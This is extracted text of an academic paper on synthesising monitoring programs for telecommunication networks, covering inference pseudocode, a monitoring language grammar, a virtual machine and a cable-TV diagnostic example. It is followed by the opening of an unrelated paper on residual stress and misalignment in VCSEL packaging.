FindAchievableElements(maxLevel, M, CurrentM, TargetM) 2. if M.NonProven.length == 0 do 3. for each l in [0..maxLevel] do 4. M.TransitionSequence = zip(zip(M.AchievedWith[l], M.AchievedWhile[l]), zip(M.AchievedFrom[l], M.AchievedTo[l])) /* to get a list of quads of the form (function, condition, input, output)*/ 5. else error ‘no transition is found’ 6. return M Method for restoring programs from the results of the proof based on backward inference Below the description of the method is given. Input data. {dw} - the sets of the input data elements; {ds} - the sets of the output data elements. Target data elements are considered as the input, and the input data elements as the target elements because the inference is backward. Output data. PRG -models of monitoring programs. The pseudo-code of the method is the following: Function BackwrdProgramSynthesis(maxLevel, M, CurrentM, TargetM) is The resulting program is a sequence of program structure elements that can be converted to program code written using scripting languages. Complexity of multilevel synthesis of monitoring programs The upper boundary of time TH required for program synthesis using the proposed method can be estimated by the following formula: TH ≈c K∑ i=0 m2i ≤c( K∑ i=0 mi) 2 (1) where: c –constant-coefficient; mi- the number of conditions on i-th level. It is necessary to mention that mi is essentially less than the total number of the conditions of the automata model. Taking into account that on upper levels each inference step is equivalent to ni steps at the level ‘‘0’’, one can get a lower boundary of time TL of multilevel synthesis of the programs, TL≈c K∑ i=0 m2i n2i ≤c K∑ i=0 m2i (2) The average estimate of time T of multilevel synthesis concerning (1), (2) is equal to T =(TL+TH)/2. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 1. PRG = initializeProgram 2. MProc = initializeProgramModel 3. /* Build the model of monitoring program using backward inference, TargetM and CurrentM are swapped*/ 4. MProc = DirectProgramSynthesis(maxLevel, MProc, TargetM, CurrentM) 5. MProg = reproduceTransitionSequences(MProc) 6. /* Build the model of the monitoring program according to the synthesized structure */ 7. for each l in [(maxLevel-1)..0] do 8. for each i in [0.. MProc.AchievedWith[l].length] do 9. z = getFunKind(MProc.AchievedWith[l][i]) 10. v = getFunType(MProc.AchievedWith[l][i]) 11. MProg.StructureElements[l] = add(MProg.StructureElements[l], buildStructureEle- ment(z, v)) 12. End 13. for each i in [0.. MProc.AchivedWhile[l].length] do 14. conditions = MProc.AchivedWhile[l][i] 15. MProg.Condition[l] = add(MProg.Condition[l], buildConditions(conditions)) 16. end 17. MProg.Program[l] = buildProgramForLevel(MProg.StructureElements[l], MProg.Condition[l]) 18. /* transform program structure elements of each level to the resulting program structure */ 19. PRG = buildProgram(PRG, MProg.Program[l]) 20. end 21. return PRG IMPLEMENTATION OF MONITORING PROGRAMS Language for monitoring programs We design the language to describe the programs for monitoring of telecommunication networks. The programs are intended for execution on end-user devices. The following requirements were imposed on the capabilities of the language. The language should allow configurable filtering and data aggregation parameters, determine the composition of messages sent from the devices, specify commands for performing actions by the devices, and determine the conditions for their execution. Vocabulary and syntax are defined for the modeling language. The vocabulary is presented in Table 1, the syntax is given as follow: program=:‘module’ id ‘;’ (global_var_definition | function_definition)* < end of file> global_var_definition=:id(name) ‘=’ expression ‘;’ function_definition=:id(name) ‘(’ (id(param_name) (‘,’ id(param_name))*)? ‘)’ ‘{’ (statement)* ‘}’ statement =:expression ‘;’ | id(local_var) ‘=’ expression ‘;’ | ‘if’ ‘(’ expression ‘)’ statement (‘else’ statement)? | (id(label) ‘:’)? ‘while’ ‘(’ expression ‘)’ statement | (id(label) ‘:’)? ‘do’ statement ‘while’ ‘(’ expression ‘)’ ‘;’ Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 Table 1 Vocabulary of the modeling language. Symbol Desription space, tab, \n, \r separator // or /* */ comment [A-Za-z_][0-9A-Za-z_]* identifier \’’ \n \r \t \xNN \\\0’’ literal string {} block of code | (id(label) ‘:’)? ‘for’ ‘(’ initializer_list ‘;’ expression ‘;’ (expression (‘,’ expression)*)? ‘)’ statement | ‘{’ (statement)* ‘}’ | ‘break;’ | ‘return’ expression ‘;’ exression =:ternary ternary =:concatenation (‘?’ ternary ‘:’ ternary )? concatenation = logical (‘_’ logical)* logical =:comparison ((‘&&’ | ‘||’) comparison)* comparison =:math ((‘< ’ | ‘< =’ | ‘> ’ | ‘> =’ | ‘==’ | ‘!=’) math)? math =:muls ((‘+’ | ‘-’ muls)* muls =:unary ((‘*’ | ‘/’ | ‘%’ | ’*’ | ‘&’ | ‘|’ | ‘< < ’ | ‘> > ’) unary)* unary =:unary_head unary_tail unary_head=:NUMERIC_CONST | STRING_LITERAL | id(var_name) | (‘-’ | ‘∼’ | ‘!’ | ‘++’ | ‘–’) unary_head | ‘(’ expression ‘)’ | ‘[’ id(field_name) (‘,’ id(field_name))* ‘]’ ((‘*’ muls) / (‘{’ expression (‘,’ expression)* ‘}’))? ’ unary_tail=:‘[’ expression (‘:’ expression)? )‘]’ | (‘:=’ | ‘+=’ | ‘-=’ | ‘/=’ | ‘_=’ ....) expression | ‘(’ expression (‘,’ expression)* ‘)’ | ‘.’ id(field_name) | ‘++’ | ‘–’ The source codes of the programs are encoded in utf8. The modeling language is a typed language. Types are not converted to each other automatically. Each expression has a type known at the compilation stage. Types have no names. The same types are those that have the same constructors and the same sets of parameters. The language supports the following data types: int (32 bits with a sign), bool (false | true), string (characters in utf-8, addressed byte by byte), table (an array of variable size, containing structures with fields), link to a function, array of variable size. Variables in the language are set in the form: ‘‘name = initializer’’. The type of initializer simultaneously sets the type of the variable. It is forbidden to declare an uninitialized Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 variable. Variables starting with ‘‘_’’ are reserved for platform variable names (for example, _currentTime). A variable that has not been modified in the program code are considered as constant when compiled. Global variables are initialized before the function that starts the program is called. They are initialized in the order of their declaration in the program. It is possible to access global variables before declaring them. If during the initialization of global variables functions are called, then in these functions, global variables that are not yet initialized cannot be used. Changes in variables (assignment) is performed by a group of operators + =, & = b, etc. To assign a new value to a variable, the operator:: = is used. Local variables are defined in context from the declaration point to the end of the block in which they are declared. Local variables declared in the header of the for loop are defined in this header and the loop body. Declaring two identical variables in the same context is not allowed. Also, overriding (hiding) an external context variable is not allowed. The language provides the following control structures: block of operators, declaration of a local variable, expression, condition, loop, exit from the loop, exit from the function, and return value. The functions in the proposed modeling language are described in the form: ‘name (parameters) {actions}’. Nested local functions are not supported, as this leads to the need to work with closures and increases the complexity of the program. The result of the return expression determines the type of result. The types of parameters are determined by the actual parameters passed in the first function call. The types of parameters in all calls must match because using polymorphism or instantiating templates can lead to an increase in the size of the generated code and to increase the time of program execution. Functions can be called before they are declared. Functions can be called directly, assigned to variables, passed as parameters, and returned as results. When working with strings, the following operations can be performed: assigning a literal constant, concatenation, obtaining the length of a string, converting a string to a number, converting a number to a string, receiving a substring, comparing strings, parsing a string and patterns, searching for a string in a table, parsing parameters. The following options are provided for working with the tables: create a table, create a table with initialization, access fields, get the number of records, insert records, delete records, search in the table by a numeric key, search in the table by a string key. When working with arrays, it is possible to create them, create with initialization, access elements, get the size, insert elements, delete elements, search for an element. The data is encoded by the int data type and corresponds to Unix time. Further extension of the developed language is possible, in particular, support of program interfaces, class structures, inheritance mechanisms. Program models for monitoring The program is translated into a binary format. The translation is provided through a developed compiler. As a result of the translation, a program module is formed. During Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 the conversion, the compiler checks the syntax of the program text, the consistency of the names, and the compatibility of the type. When describing a program in binary format, instructions in the general command language are used, which makes it possible to extend the developed language. Instructions are strictly typed that allows high-speed program execution. The compactness of the binary programs is ensured by using language structures that are close to the solved monitoring tasks and by the compactness of the structures themselves. Monitoring programs are intended for execution by the virtual machines. Loading and unloading modules, their registration and calls assumed to be carried out through the software interface, which is provided by the machines: int vm_load_module (void* data); // data should be allocated with vm_alloc void vm_free_module (int id); size_t vm_lookup (char* fn_name); void vm_call (size_t ord, char* params); void *vm_alloc (size_t size); Modules cannot call each other’s functions or exchange information. When the module is loaded, the start () function that registers the named event handlers is executed. The predefined handlers are the following: ‘‘t’’ –a timer handler that is called once a second in the idle mode; ‘‘c’’ –a handler that is called in response to a console command; ‘‘s’’ –a handler that is called, before sending any packet, allows adding the necessary fields and events to the packet. Parameters are passed to the handlers as text strings with separators ‘‘|’’. In the language, the operators that allow extract parameters from the strings of this format are supported. // if called myHandler(‘‘123|Hello’’); myHandler(p) { screen = intArg(); // screen = 123 mode = strArg(); // mode = ‘‘Hello’’; ... } The loadable modules have access to the sets of system variables, parameters provided by system functions. They can initiate actions that can be performed by the system functions. TimerProc(s) { if (_systemMemFree < 1024*1024) reboot(); } When executing code in a virtual machine, the following verification procedures are performed: availability of free memory, stack overflow error, looping, index out of array bounds error, accessing uninitialized fields, division by zero, getting the remainder of division by zero. When an exception occurs, the module is unloaded, and its resources are freed, then its handler stops perceiving information about external events. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 A virtual machine for monitoring The synthesized monitoring programs are executed by the virtual machine (VM) [29], whose structure is shown in Fig. 2. The main elements of the virtual machine are the following: CN (Computer Network) Agent - an application running on a network element and containing a virtual machine (CN VM) in which program modules are executed; CN VM (Virtual Machine) –the environment for the program modules execution; CM VM prodModule - an agent which logic is determined by the synthesized programs that are loaded on the elements of the networks; Logger –an element of the network that is responsible for collecting and providing log files produced by the elements of the networks. The logic of using the virtual machine is as follows. Program modules are compiled for each of the synthesized programs. The modules are placed on the Data Provider. When new modules appear, they are loaded into the VM. To load the modules, DTS is used. VM ensures the execution of the modules. The logic of data gathering and data processing that is defined by the loaded program modules can be executed once, in the loop, or on the event. The gathered data is recorded during the execution of the module by the Logger. The collected data is transmitted to the monitoring system. There is a possibility for messages exchanging between the VM and the monitoring system. The CN Listener provides it. The monitoring system can manage the virtual machine using the Command Manager. DISCUSSION The proposed method for program synthesis can be used for a number of real-life applications. The cable TV network monitoring system is taken as a typical example of a telecommunication network. A common cable TV network contains one or more servers that serve TV receivers of the end-users. The receivers provide users a variety of services for watching TV. The task of the monitoring systems is to identify the errors that occur on the devices of the end-users, to localize them, and find their causes. Monitoring systems are deployed on the servers, and the virtual machines are installed on TV receivers. Program modules for monitoring are synthesized on the servers and are executed by the virtual machines. The software of the TV receivers has a multi-level structure. The software of the upper levels provides the logic of the user’s services. On the low levels, the interaction with technical means is implemented. The number and composition of the intermediate levels depend on the type of receivers. The intermediate levels can include a level of the primary functions and a transport level. The state of each user service is characterized by several parameters related to different levels of the software structure. There are links between the parameters of different levels. The primary user services include image display services (Video), services of individual delivery of television programs and films to subscribers (VOD (Video on Demand, VOD), services for viewing private live broadcasts (PPV (Pay per View, PPV) and others. To the Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 Figure 2 Monitoring virtual machine structure. Full-size DOI: 10.7717/peerjcs.288/fig-2 essential services refer Electronic Program Guide service (EPG), service for writing data to disk (DVR), authorization service (Authorization), service for switching between channels (ChanelSW), etc. Transport level services allow receive/transmit data to external systems. These services receive data from the tuner (Tuning service), decode incoming data streams (Decoding service). An error in the operation of any service results in malfunctioning of one or several end-user services. Regular monitoring assumes control of the parameters that characterize the state of the end-user services, including Video, VOD, and PPV services. These parameters are NO_Video, NO_VOD, NO_PPV. They take the value ’true’ when errors occur in the working of these services. If one of the parameters takes the value ’true’, a message is formed on the TV receiver and transmitted to the monitoring system. After receiving one such message, the monitoring system synthesizes a new monitoring program for collecting data necessary to localize the error and identify its cause. The synthesized program is compiled and loaded on the receiver that has sent the message. A model of the process of regular monitoring of a user service is presented in Fig. 3. The monitoring process may be in one of the following states: initial state S0 and final state S1, processing of a parameter S2, service is fully functional S3, service is malfunctioning S4, sending an error message about service failure S5. The values of the controlled parameters determine transitions between the states. If an error occurs, the newly synthesized programs provide a collection of additional parameters related to services provided by the software of the lower levels. In this case, the process model has a structure that is shown in Fig. 4. The following states are defined in the model: initial state S0, final state S1, collection of an extended set of parameters S2, processing of an extended set of parameters S3, service is fully functional S4, service is Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.288/fig-2 http://dx.doi.org/10.7717/peerj-cs.288 Figure 3 Model of the regular monitoring process. Full-size DOI: 10.7717/peerjcs.288/fig-3 Figure 4 Model of the monitoring process in case an error occurs in the work of a service. Full-size DOI: 10.7717/peerjcs.288/fig-4 malfunctioning S5, sending an error message about the service failure S6, sending collected additional parameters S7. Consider the situation when there is no image on the user’s screen, i.e., NO_Video error has occurred. Other upper-level services, in particular, VOD and PPV, are operating normally. Thus, the initial state of the users’ device is described by the following vector of the parameters {NO_Video, VOD, PPV}, the output vector is defined as {Video}. The output vector corresponds to the state of the device when there is an image on the screen. Fig. 5 shows the scheme of the synthesis that allows reaching the state {Video} from the state {NO_Video, VOD, PPV}. The synthesis is carried out in two directions - direct and reverse. Within the direct synthesis, the possibilities of transition from {NO_Video, VOD, PPV} to {Video} are considered. If such possibilities exist, then reverse synthesis allows building programs of monitoring on the base of identified possibilities. Figure 5 shows the services of various levels and links between them. The descriptions of the software structure determine the links between the services. The solid line indicates known links that exist. The dotted lines show the links that should exist when the Video service is fully functional. According to the Fig. 5, the result of the direct synthesis is the vector {DVR, EPG, Decoding, Authorization, ChanelSW}. The state of the Tuning service is unknown, but it is required to identify the possibility of reaching the state {Video}. Using the reverse Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.288/fig-3 https://doi.org/10.7717/peerjcs.288/fig-4 http://dx.doi.org/10.7717/peerj-cs.288 Figure 5 The scheme of the synthesis of the monitoring programs to identify the cause of no image on users TV screens. Full-size DOI: 10.7717/peerjcs.288/fig-5 synthesis, the sequence {Video} -> {Tuning} -> {No_Video} is constructed. Following this sequence, it is necessary to check the tuner’s function of data receiving. A dozen parameters characterize the status of the tuner function of data received. The types of tuners determine them. The synthesized monitoring program contains commands for collecting the required set of parameters. Below fragments of synthesized programs are presented. The following program is used for regular monitoring of the state of the Video service: module main; // event code assignment NO_VIDEO_EVENT = < event_code> ; start(){ // event registration register(‘‘dc:NoVideo()’’,NoVideo); } SendAlertNoVideo(){ alertTime = _currentTime; { reportInt(NO_VIDEO_EVENT); reportInt(alertTime); return true; } return false; } Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 16/21 https://peerj.com https://doi.org/10.7717/peerjcs.288/fig-5 http://dx.doi.org/10.7717/peerj-cs.288 The program below provides the collection of additional parameters that allow find the causes of no image on the users’ screens: module main; start(){ // standard initialization procedures ... //gathering required parameters reportInt(vm_ia_firstTunerParam); reportInt(vm_ia_secondTunerParam); ... reportInt(vm_ia_NTunerParam); // standard termination procedures ... } CONCLUSION In the article, the multilevel synthesis of programs for telecommunication networks monitoring is discussed. A new method for monitoring dynamic networks with a multilevel structure is proposed. A new language for describing monitoring programs has been developed. The programs are translated into binary code using a compiler. The compiled programs can be executed in monitoring systems and on end-user devices. For this, a new virtual machine that is installed on the elements of the network has been designed and implemented. The value of the proposed multilevel synthesis is that it offers the possibility to build reconfigurable monitoring systems for telecommunication networks. The proposed method can be used for telecommunication networks monitoring in a wide range of subject domains. Further development of the ideas of multilevel synthesis of monitoring programs assumes its application for a wide range of subject domains. ADDITIONAL INFORMATION AND DECLARATIONS Funding The paper was prepared in Saint–Petersburg Electrotechnical University (LETI), and is supported by the Agreement No 075-11-2019-053 dated 20.11.2019 (Ministry of Science and Higher Education of the Russian Federation, in accordance with the Decree of the Government of the Russian Federation of April 9, 2010 No. 218), project "Creation of a domestic high-tech production of vehicle security systems based on a control mechanism and intelligent sensors, including millimeter radars in the 76-77 GHz range". The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 17/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 Grant Disclosures The following grant information was disclosed by the authors: Ministry of Science and Higher Education of the Russian Federation: 075-11-2019-053. Competing Interests Andrey Kalmatskiy and Natalia Alexandrovna Zhukova were employees of Zodiac Systems, Russia & USA. Andrey Kalmatskiy is currently an employee of Google, USA. Author Contributions • Man Tianxing conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Vasiliy Yurievich Osipov, Alexander Ivanovich Vodyaho and Andrey Kalmatskiy conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • Natalia Alexandrovna Zhukova performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Sergey Vyacheslavovich Lebedev performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Yulia Alexandrovna Shichkina analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available at GitHub: https://github.com/karol11/lispy. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.288#supplemental-information. REFERENCES Al Mamun MA, Hannan M, Hussain A, Basri H. 2016. Theoretical model and implementation of a real time intelligent bin status monitoring system using rule based decision algorithms. Expert Systems with Applications 48:76–88 DOI 10.1016/j.eswa.2015.11.025. Baig MM, GholamHosseini H, Moqeem AA, Mirza F, Lindén M. 2017. A sys- tematic review of wearable patient monitoring systems–current challenges and opportunities for clinical adoption. Journal of Medical Systems 41(7):115 DOI 10.1007/s10916-017-0760-1. Bello JP, Silva C, Nov O, DuBois RL, Arora A, Salamon J, Mydlarz C, Doraiswamy H. 2018. SONYC: a system for the monitoring, analysis and mitigation of urban noise pollution. ArXiv preprint. arXiv:180500889. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 18/21 https://peerj.com https://github.com/karol11/lispy http://dx.doi.org/10.7717/peerj-cs.288#supplemental-information http://dx.doi.org/10.7717/peerj-cs.288#supplemental-information http://dx.doi.org/10.1016/j.eswa.2015.11.025 http://dx.doi.org/10.1007/s10916-017-0760-1 http://arXiv.org/abs/180500889 http://dx.doi.org/10.7717/peerj-cs.288 Cabal-Yepez E, Garcia-Ramirez AG, Romero-Troncoso RJ, Garcia-Perez A, Osornio- Rios RA. 2012. Reconfigurable monitoring system for time-frequency analysis on industrial equipment through STFT and DWT. IEEE Transactions on Industrial Informatics 9:760–771 DOI 10.1109/tii.2012.2221131. Chakravarthi MK, Tiwari RK, Handa S. 2015. Accelerometer based static gesture recog- nition and mobile monitoring system using neural networks. Procedia Computer Science 70:683–687 DOI 10.1016/j.procs.2015.10.105. Cong J, Liu B, Neuendorffer S, Noguera J, Vissers K, Zhang Z. 2011. High-level synthesis for FPGAs: From prototyping to deployment. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 30:473–491 DOI 10.1109/tcad.2011.2110592. Cong J, Minkovich K. 2007. Optimality study of logic synthesis for LUT-based FPGAs. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 26:230–239 DOI 10.1109/tcad.2006.887922. Dovžan D, Logar V, Škrjanc I. 2014. Implementation of an evolving fuzzy model (eFuMo) in a monitoring system for a waste-water treatment process. IEEE Trans- actions on Fuzzy Systems 23:1761–1776 DOI 10.1109/tfuzz.2014.2379252. Eissa M, Elmesalawy MM, Hadhoud MM. 2015. Wide area monitoring system based on the third generation universal mobile telecommunication system (UMTS) for event identification. International Journal of Electrical Power & Energy Systems 69:34–47 DOI 10.1016/j.ijepes.2014.12.077. Fu H. 2012. Equalization for high-speed serial interfaces in Xilinx 7 series FPGA transceivers. Xilinx White Paper. 419:1 Available at https://www.xilinx.com/support/ documentation/white_papers/wp419-7Series-XCVR-Equalization.pdf . Gaikwad N, Mistry Y. 2015. Review on environment monitoring system and energy efficiency. International Journal of Engineering Research and Applications 5:90–92. Ge Z, Song Z, Gao F. 2013. Review of recent research on data-based process monitoring. Industrial & Engineering Chemistry Research 52:3543–3562 DOI 10.1021/ie302069q. Koetter F, Kochanowski M. 2015. A model-driven approach for event-based business process monitoring. Information Systems and e-Business Management 13:5–36 DOI 10.1007/s10257-014-0233-8. Korableva O, Kalimullina O, Kurbanova E. 2017. Building the monitoring systems for complex distributed systems: problems and solutions. ICEIS 2:221–228. Kumar A, Kim H, Hancke GP. 2012. Environmental monitoring systems: a review. IEEE Sensors Journal 13:1329–1339. Lyke JC, Christodoulou CG, Vera GA, Edwards AH. 2015. An introduction to reconfig- urable systems. Proceedings of the IEEE 103:291–317 DOI 10.1109/JPROC.2015.2397832. Lysecky R, Vahid F, Tan SX-D. 2004. Dynamic FPGA routing for just-in-time FPGA compilation. In: Proceedings of the 41st annual design automation conference. ACM, 954–959. Maksymyuk T, Dumych S, Brych M, Satria D, Jo M. 2017. An IoT based monitoring framework for software defined 5G mobile networks. In: Proceedings of the 11th Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 19/21 https://peerj.com http://dx.doi.org/10.1109/tii.2012.2221131 http://dx.doi.org/10.1016/j.procs.2015.10.105 http://dx.doi.org/10.1109/tcad.2011.2110592 http://dx.doi.org/10.1109/tcad.2006.887922 http://dx.doi.org/10.1109/tfuzz.2014.2379252 http://dx.doi.org/10.1016/j.ijepes.2014.12.077 https://www.xilinx.com/support/documentation/white_papers/wp419-7Series-XCVR-Equalization.pdf https://www.xilinx.com/support/documentation/white_papers/wp419-7Series-XCVR-Equalization.pdf http://dx.doi.org/10.1021/ie302069q http://dx.doi.org/10.1007/s10257-014-0233-8 http://dx.doi.org/10.1109/JPROC.2015.2397832 http://dx.doi.org/10.7717/peerj-cs.288 international conference on ubiquitous information management and communication. 1–4. Morgan J, O’Donell G. 2014. A service-oriented reconfigurable process monitoring system-enabling cyber physical systems. Journal of Machine Engineering 14:116–129. Morgan J, O’Donnell GE. 2018. Cyber physical process monitoring systems. Journal of Intelligent Manufacturing 29:1317–1328 DOI 10.1007/s10845-015-1180-z. Mukhopadhyay SC. 2014. Wearable sensors for human activity monitoring: a review. IEEE Sensors Journal 15:1321–1330 DOI 10.1109/jsen.2014.2370945. Myint CZ, Gopal L, Aung YL. 2017. Reconfigurable smart water quality monitoring system in IoT environment. In: 2017 IEEE/ACIS 16th international conference on computer and information science (ICIS). Piscataway: IEEE, 435–440. Osipov VY, Vodyaho AI, Zhukova NA, Glebovsky PA. 2017. Multilevel automatic synthesis of behavioral programs for smart devices. In: 2017 international conference on control, artificial intelligence, robotics & optimization (ICCAIRO). IEEE, 335–340. Osipov VY. 2016. Automatic synthesis of action programs for intelligent robots. Pro- gramming & Computer Software 42(3):155–160 DOI 10.1134/s0361768816030063. Raju KRSR, Varma GHK. 2017. Knowledge based real time monitoring system for aquaculture using IoT. In: 2017 IEEE 7th international advance computing conference (IACC). Piscataway: IEEE, 318–321. Rubin R, DeHon A. 2011. Choose-your-own-adventure routing: lightweight load-time defect avoidance. ACM Transactions on Reconfigurable Technology and Systems (TRETS) 4(4):1–24 DOI 10.1145/2068716.2068719. Sakhardande P, Hanagal S, Kulkarni S. 2016. Design of disaster management system using IoT based interconnected network with smart city monitoring. In: 2016 international conference on internet of things and applications (IOTA). Piscataway: IEEE, 185–190. Shichkina Y, Kataeva G, Irishina Y, Stanevich E. 2019. The architecture of the system for monitoring the status in patients with Parkinson’s disease using mobile technologies. Studies in Computational Intelligence 868:531–540. Silva N, Marques ER, Lopes LM. 2018. Flux: a platform for dynamically reconfigurable mobile crowd-sensing. ACM Transactions on Sensor Networks (TOSN) 14(3–4):1–25 DOI 10.1145/3200202. Singh R, Gernaey KV, Gani R. 2010. An ontological knowledge-based system for the selection of process monitoring and analysis tools. Computers & Chemical Engineering 34:1137–1154 DOI 10.1016/j.compchemeng.2010.04.011. Sohn H, Farrar CR, Hemez FM, Shunk DD, Stinemates DW, Nadler BR, Czarnecki JJ. 2003. A review of structural health monitoring literature: 1996–2001. USA: Los Alamos National Laboratory. Stefanov K, Voevodin V, Zhumatiy S, Voevodin V. 2015. Dynamically reconfigurable distributed modular monitoring system for supercomputers (DiMMon). Procedia Computer Science 66:625–634 DOI 10.1016/j.procs.2015.11.071. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 20/21 https://peerj.com http://dx.doi.org/10.1007/s10845-015-1180-z http://dx.doi.org/10.1109/jsen.2014.2370945 http://dx.doi.org/10.1134/s0361768816030063 http://dx.doi.org/10.1145/2068716.2068719 http://dx.doi.org/10.1145/3200202 http://dx.doi.org/10.1016/j.compchemeng.2010.04.011 http://dx.doi.org/10.1016/j.procs.2015.11.071 http://dx.doi.org/10.7717/peerj-cs.288 Suma N, Samson SR, Saranya S, Shanmugapriya G, Subhashri R. 2017. IOT based smart agriculture monitoring system. International Journal on Recent and Innovation Trends in Computing and Communication 5:177–181. Thompson A. 2012. Hardware evolution: automatic design of electronic circuits in reconfig- urable hardware by artificial evolution. London: Springer Science & Business Media DOI 10.1007/978-1-4471-3414-5. Yang Z, Zhou Q, Lei L, Zheng K, Xiang W. 2016. An IoT-cloud based wearable ECG monitoring system for smart healthcare. Journal of Medical Systems 40(12):286 DOI 10.1007/s10916-016-0644-9. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 21/21 https://peerj.com http://dx.doi.org/10.1007/978-1-4471-3414-5 http://dx.doi.org/10.1007/s10916-016-0644-9 http://dx.doi.org/10.7717/peerj-cs.288 work_5xauxfpkpffzjmeon76ftymtxi ---- Stress Distribution and Alignment Shift Analyses in the VCSEL The Effect of Residual Stress on Coupling Power Loss of VCSEL Modulus Jao-Hwa Kuang 1 , Chao-Ming Hsu 2 , Ah-Der Lin 3 , Jyun-Wei Luo 3 1.Dept. of Mech. and Electro-Mech. Engr., National Sun Yat-Sen Univ., kuang@faculty.nsysu.edu.tw 2.Dept. of Mech. Engr., National Kaohsiung Univ. of App. Sci., jammy@cc.kuas.edu.tw 3.Dept. of Mech. Engr., Cheng-Shiu Univ.,ader@csu.edu.tw Kaohsiung, Taiwan Abstract. In this article, the effect of residual stress on active region misalignment of laser light sources for vertical cavity surface emitting laser (VCSEL) modulus has been studied. The post-weld-shift variation of active region introduced from the residual stress distribution variation for different VCSEL solder joints, i.e. tin-silver (Sn/3.5Ag) and tin-lead (Sn/37Pb) solder joints, are simulated by employing the thermal-elastic-plastic finite element model of MARC package. The ball grid solidification in reflow process and the creep deformation in the acceleration aging were simulated and analyze. The time and temperature dependent material properties of solders are employed. Numerical results indicate that the post-weld-shift introduced from residual stress in the solidification process are significant, and are also the key reasons to reduce the coupling efficiency in VCSEL packaging. The non-sequential components models in commercial Zemax optical package were used to estimate the optical coupling power loss between the active region and the fiber tip in VSCEL modulus. The results show that the proposed post-weld-shift model is feasible to analyze and to improve the solder joint design in the VCSEL packaging. Keywords: VCSEL, FEM , Creep , residual stresses, misalignment. 1. Introduction Manufactured by GeAs, the VCSEL modulus is an active opto-electronic device, and quite different from traditional laser diodes [1]. It has a compact volume coupled with fiber by circle beam, and is made in an arrayed form for better fiber communications [2] [3]. The optical coupled power of a VCSEL modulus depends upon residual stress distribution and the corresponding PWS (post-weld shift) after the reflow process [4]. To ensure the reliability of the VCSEL modulus for temperature-fluctuating operations, the endurance tests are necessary and versatile [5]. The notable item is the acceleration aging test. In the test, the thermal stresses dominate the VCSEL modulus deformation which induces the active region misalignment for VCSEL. The misalignment has a strong influence on the optical coupled power loss [6]. Basically, the VCSEL modulus is classified into three parts; VCSEL structure, micro-solder ball and silicon bench (substrate), as shown in figure 1. The dimensions of VCSEL modulus are 4200x1200x2400µm. The sizes of a VCSEL structure are 1000x300x265.5µm. In the opto-electronic packaging, solder surface mounted technology (SMT) is used to connect the components [7]. To assemble the VCSEL modulus, SMT uses different solder ball joints, such as Sn/37Pb and Sn/3.5Ag solders. Of particular interest, the pad design is the layout for laser sources, layers mounting markers, and solder ball positioning, etc. (a) VCSEL modulus (b) Details of VCSEL structure Fig.1 Schematic illustrations of VCSEL In this study, both Sn/37Pb and Sn/3.5Ag solders are simulated. The residual stresses for both solders are calculated for the reflow process and acceleration aging test. The coefficient of thermal expansion (CTE) of GaAs is two times as that of silicon. Due to the CTE difference between GaAs and Si, the residual stress has great influence on the yielding and misalignment of VCSEL. The effect of creeping is included in the acceleration aging test. The active region misalignment induced by the residual stress will be investigated for evaluating the optical coupled power loss for VCSEL. Fig.2 Finite element mesh model for VCSEL modulus 2. Finite element model for VCSEL modulus Surface Evolver simulating the solder solidification process is used to predict the shape of solder during the reflow process. The reflowed solder shape will be reconstructed in the finite element package of MSC, MARC. Figure 2 shows the VCSEL mesh model symmetric about yz-plane. The substrate is made of pure silicon and its sizes are 1000x300x250 µm. The node number is 12480 for VCSEL structure, 960 for micro-solder ball, and 7800 for substrate, respectively. The laser sources in the VCSEL structure indicated by points A are located at the center of the active region, as shown in figure 1 (b). The primary composition of VCSEL structure consists of GaAs, Au, Pt and Ti. Considering the creeping effects, the power of first order is included in this study[8]. On the boundary, the nature convection coefficient for a local area was proposed by Ellison [9] based upon experimental method. Table 1 lists the experience factors of the nature convection coefficient having a value of zero on the symmetric surface. The nature convection coefficient can be written as below. h =2.79k (△T/L) m (W/m 2 ‧℃) where h is the nature convention coefficient, △T the temperature difference between boundary and environment(℃), m the first experience factor, k the second experience factor, and L the characteristic length(m). Furthermore, the corners of yz-plane (the symmetric plane) are fixed, and the other points of yz-plane have no displacement in the x-direction. The material of VCSEL modulus follows the isotropic-hardening rule, von- Mises yielding criterion, and Prandtl-Reuss flow rule. The optical coupled power loss of VCSEL modulus is 